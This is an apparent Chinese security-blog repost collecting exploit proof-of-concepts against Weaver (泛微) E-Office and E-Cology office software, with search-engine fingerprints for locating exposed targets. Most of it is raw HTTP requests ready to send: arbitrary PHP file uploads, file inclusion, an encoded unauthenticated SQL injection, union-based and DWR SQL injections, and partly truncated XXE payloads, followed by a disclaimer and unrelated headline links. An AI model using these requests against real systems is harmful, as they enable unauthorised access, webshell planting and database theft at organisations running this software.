2023hvv泛微合集

admin

140816
文章

117
评论

2023年8月30日02:59:43评论15 views字数 4178阅读13分55秒阅读模式

网络测绘：

app="泛微-EOffice"，app="泛微-E-Weaver"

title="泛微云桥e-Bridge"，app="泛微-协同办公OA"

泛微 Weaver E-Office9 前台文件包含

2023hvv泛微合集

http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls

泛微E-Office9文件上传漏洞

2023hvv泛微合集


POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1Host:XXXCache-Control:max-age=0Upgrade-Insecure-Requests:1Origin:nullContent-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6ttAccept-Encoding:gzip, deflateAccept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7Connection:close------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition:form-data; name="upload_quwan"; filename="1.php."Content-Type:image/jpeg<?phpphpinfo();?>------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

泛微E-Office9文件上传漏洞


POST /inc/jquery/uploadify/uploadify.php HTTP/1.1Host: XXXUser-Agent: testConnection: closeContent-Length: 493Accept-Encoding: gzipContent-Type: multipart/form-data------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="Filedata"; filename="666.php"Content-Type: application/octet-stream<?php phpinfo();?>------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

泛微OA E-Cology9未授权SQL注入漏洞（CNVD-2023-12632）

2023hvv泛微合集

POST /mobile/plugin/browser.jsp HTTP/1.1Host:***Upgrade-Insecure-Requests: 1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9x-forwarded-for:***x-originating-ip:***x-remote-ip: ***x-remote-addr:***Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 649
isDis=1&amp;browserTypeId=269&amp;keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

泛微E-Office uploadify.php后台文件上传漏洞

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36Connection: closeContent-Length: 259Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4Accept-Encoding: gzip
--e64bdf16c554bbc109cecef6451c26a4Content-Disposition: form-data; name="Filedata"; filename="2TrZmO0y0SU34qUcUGHA8EXiDgN.php"Content-Type: image/jpeg

<?php echo "2TrZmO0y0SU34qUcUGHA8EXiDgN";unlink(__FILE__);?>

--e64bdf16c554bbc109cecef6451c26a4--

上传文件所在路径：
/attachment/3466744850/xxx.php

泛微E-Cology XXE漏洞（QVD-2023-16177）

影响版本：泛微 EC 9.x 且补丁版本 < 10.58.2；泛微 EC 8.x 且补丁版本 < 10.58.2

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1Host:***Content-Type: application/xml<M><syscode>&send;</syscode></M>

EXP1:

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1Host:****Content-Type: application/xml

EXP2：

POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1Host:***Content-Type: application/xml<?xml version="1.0" encoding="utf-8"?><!DOCTYPE syscode SYSTEM "

泛微 ShowDocsImagesql注入漏洞

GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) Accept-Encoding: gzip, deflateConnection: close

泛微 HrmCareerApplyPerView S Q L 注入漏洞

GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1Host: 127.0.0.1:7443User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)Accept-Encoding: gzip, deflateConnection: close

泛微 E-Cology 某版本 SQL注入漏洞 POC

POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1Host: xxx.xxx.xxx.xxx:portUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeContent-Length: 189Content-Type: text/plainAccept-Encoding: gzip
callCount=1page=httpSessionId=scriptSessionId=c0-scriptName=DocDwrUtilc0-methodName=ifNewsCheckOutByCurrentUserc0-id=0c0-param0=string:1 AND 1=1c0-param1=string:1batchId=0

原文始发于微信公众号（左逆安全攻防）：2023hvv泛微合集

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

2023hvv泛微合集

网络测绘：

app="泛微-EOffice"，app="泛微-E-Weaver"

title="泛微云桥e-Bridge"，app="泛微-协同办公OA"

霆智科技 VA虚拟应用平台任意文件读取

Xtream反序列化

Node.js 高危漏洞警报(CVE-2025-23166)：可导致远程系统崩溃

Google Chrome 访问控制不当漏洞(CVE-2025-4664)

Node.js 异步加密错误处理不当漏洞(CVE-2025-23166)

原创先锋后台管理存在未授权访问漏洞

CVE-2025-30406 CentreStack ViewState 反序列化漏洞分析

Node.Js 异常处理不当漏洞

Google Chrome访问控制不当漏洞

F5 BIG-IP rce漏洞 CVE-2025-31644

发表评论

在线咨询

微信